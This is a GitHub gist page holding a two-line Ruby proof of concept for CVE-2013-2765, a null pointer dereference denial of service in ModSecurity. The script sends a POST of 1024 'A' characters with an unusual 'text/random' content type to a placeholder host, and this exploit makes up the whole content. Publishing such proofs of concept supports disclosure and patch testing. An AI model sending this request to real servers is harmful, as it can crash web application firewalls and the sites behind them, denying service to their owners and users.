Skip to content

Instantly share code, notes, and snippets.

@claudijd
Created July 2, 2013 14:04
Show Gist options
  • Save claudijd/5909573 to your computer and use it in GitHub Desktop.
Save claudijd/5909573 to your computer and use it in GitHub Desktop.
[CVE-2013-2765] ModSecurity Null Pointer Dereference DoS PoC
require 'rest_client'
RestClient.post "http://a.b.c.d", "A"*1024, :content_type => "text/random"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment